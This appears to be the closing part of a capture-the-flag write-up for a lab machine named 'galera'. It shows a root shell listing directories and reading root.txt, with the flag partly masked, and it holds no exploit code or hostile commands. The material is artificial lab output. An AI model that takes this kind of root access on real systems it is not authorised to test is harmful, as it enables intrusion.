bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old
root@galera:/# cd /root
root@galera:~# ls
root.txt
root@galera:~# cat /root.txt
cat: /root.txt: No such file or directory
root@galera:~# ls -al
total 36
drwx------  4 root root 4096 May  8 00:05 .
drwxr-xr-x 18 root root 4096 May  4 19:16 ..
lrwxrwxrwx  1 root root    9 May  7 23:05 .bash_history -> /dev/null
-rw-r--r--  1 root root  603 May  7 23:47 .bashrc
-rw-------  1 root root   20 May  7 23:28 .lesshst
drwxr-xr-x  3 root root 4096 May  4 19:18 .local
-rw-------  1 root root   13 May  7 23:48 .mysql_history
-rw-------  1 root root  682 May  7 21:57 .profile
-rw-------  1 root root   33 May  7 22:18 root.txt
drwx------  2 root root 4096 May  4 19:15 .ssh
root@galera:~# cat $(ls roo*)
6a0d424**********************
Posted on 2025-05-26 13:14 by he110wor1d